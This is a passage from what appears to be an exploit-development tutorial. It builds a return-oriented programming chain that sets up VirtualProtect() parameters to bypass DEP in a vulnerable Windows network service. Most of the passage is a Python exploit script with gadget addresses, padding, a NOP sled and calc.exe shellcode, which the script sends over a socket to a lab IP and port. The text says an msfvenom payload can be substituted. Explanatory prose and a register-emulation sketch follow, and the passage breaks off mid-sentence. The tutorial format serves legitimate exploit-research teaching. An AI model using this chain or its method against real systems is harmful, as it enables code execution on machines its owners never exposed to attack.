# Lastly, write EAX to the address held in the new EDX
rop2 += struct.pack ('<L', 0x41ad61cc)   # 0x41ad61cc: xor eax, eax ; ret ; (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the lpAddress ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the lpAddress ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the lpAddress ROP gadget
rop2 += struct.pack ('<L', 0x6ff7e29a)   # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP chain
rop2 += struct.pack ('<L', 0x6ff7e29a)   # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP chain
rop2 += struct.pack ('<L', 0x6ff7e29a)   # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP chain
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e942cb)   # 0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop esi instruction in the above ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP gadget

# Preparing the VirtualProtect flNewProtect parameter (fourth parameter)
# Changing EAX to equal the fourth parameter, flNewProtect (0x40)
# Increase EDX 4 bytes (to reach the VirtualProtect flNewProtect placeholder.)
# Remember, EDX currently is located at the VirtualProtect size placeholder.
# The flNewProtect parameter is located 4 bytes after the size parameter.
# Lastly, write EAX to the address held in the new EDX
rop2 += struct.pack ('<L', 0x41ad61cc)  # 0x41ad61cc: xor eax, eax ; ret ; (1 found)
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for retn 0x000C in the size ROP gadget
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for retn 0x000C in the size ROP gadget
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for retn 0x000C in the size ROP gadget
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e942cb)  # 0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for pop esi instruction in the above ROP gadget
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for pop ebp instruction in the above ROP gadget

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(rop)-len(parameters)-len(padding)-len(rop2)-len(padding2)-len(shellcode))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+rop2+padding2+shellcode+filler)
s.close()

EAX gets “zeroed out”:

EAX now contains the value of what we would like the size parameter to be:

The size parameter placeholder now contains the value of EAX, which is 0x300:

It is time now to calculate the flNewProtect parameter.

0x40 is the intended value here. It is placed into EAX:

Then, EDX is increased by four and the DWORD at the address held in EDX (the flNewProtect placeholder) is overwritten with the value of EAX, which is 0x40. All of our parameters have successfully been added to the stack:

All that is left now is to jump back to the VirtualProtect() call. But how will we do this?

Remember very early in this tutorial, when we saved the old stack pointer into ECX? We then performed some calculations on ECX so that it held the address of the first “parameter”, the return address. Recall that the return address sits four bytes after the stack slot that holds the pointer to VirtualProtect(). This means that if we decrement ECX by four bytes, it will contain the address of that slot.

However, in assembly, one of the best registers for calculations is EAX. Since we are done with the parameters, we will move the value of ECX into EAX and then decrement EAX by four bytes. Then, we will exchange EAX (which now holds the address of the stack slot containing the pointer to VirtualProtect()) with ESP. At this point, ESP will point to the VirtualProtect() pointer. Since the exchange instruction will be a part of a ROP gadget, the ret at the end of the gadget will load the value at the new ESP (the VirtualProtect() address) into EIP, thus executing the call to VirtualProtect() with all of the correct parameters on the stack!
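
The register shuffle described above can be traced with a short emulation. In this Python 3 sketch every address is hypothetical, the stack is modeled as a dictionary of DWORDs, and the decrement is written as a single subtraction regardless of which gadgets end up performing it:

```python
BASE = 0x0018F000          # hypothetical address of the VirtualProtect() pointer slot
SHELLCODE = BASE + 0x100   # hypothetical address inside the NOP sled

# Fake stack memory (address -> DWORD) with every placeholder already patched.
memory = {
    BASE + 0x00: 0x77e22e15,   # pointer to kernel32.VirtualProtect()
    BASE + 0x04: SHELLCODE,    # return address
    BASE + 0x08: SHELLCODE,    # lpAddress
    BASE + 0x0C: 0x300,        # size
    BASE + 0x10: 0x40,         # flNewProtect
    BASE + 0x14: 0x62506060,   # pOldProtect
}

ecx = BASE + 0x04              # ECX still holds the address of the return address slot
esp = 0x0018F200               # hypothetical: wherever the ROP chain currently is

eax = ecx                      # move ECX into EAX
eax -= 4                       # decrement EAX by four bytes
eax, esp = esp, eax            # exchange EAX and ESP
eip = memory[esp]              # ret: load the DWORD at ESP into EIP...
esp += 4                       # ...and pop it

print(hex(eip), memory[esp] == SHELLCODE)
```

After the final ret, EIP holds the VirtualProtect() address and ESP points at the return address slot, which is the same stack layout a normal call would have produced.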

There is one problem though. In the very beginning, we gave the arguments for return and lpAddress. These should contain the address of the shellcode, or the NOPS right before the shellcode. We only gave a 100-byte buffer between those parameters and our shellcode. We have added a lot of ROP chains since th